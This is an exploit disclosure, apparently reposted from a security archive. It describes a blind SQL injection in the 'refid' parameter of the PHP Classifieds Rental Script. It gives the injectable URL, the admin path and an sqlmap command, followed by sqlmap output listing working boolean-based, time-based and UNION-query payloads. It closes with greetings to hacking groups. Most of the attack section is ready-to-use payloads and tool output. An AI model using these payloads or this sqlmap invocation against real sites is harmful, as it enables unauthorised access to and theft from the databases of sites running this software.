PHP Classifieds Rental Script Blind SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP Classifieds Rental Script Blind SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[x]========================================================================================================================================[x] | Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities | Software : PHP Classifieds Rental Script | Vendor : http://www.i-netsolution.com/ | Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993 | Date : 06 October 2016 | Author : OoN_Boy [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price : $ 99 | Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being an easy-to- use software, this Property Rental Script [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872 | Aadmin Page : http://localhost/[path]/admin/index.php [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string [x]========================================================================================================================================[x] --- Parameter: refid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ Type: UNION query Title: MySQL UNION query (NULL) - 26 columns Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL# --- [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Greetz : antisecurity.org batamhacker.or.id | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Hi All long time no see ^_^ [x]========================================================================================================================================[x] </BODY></HTML>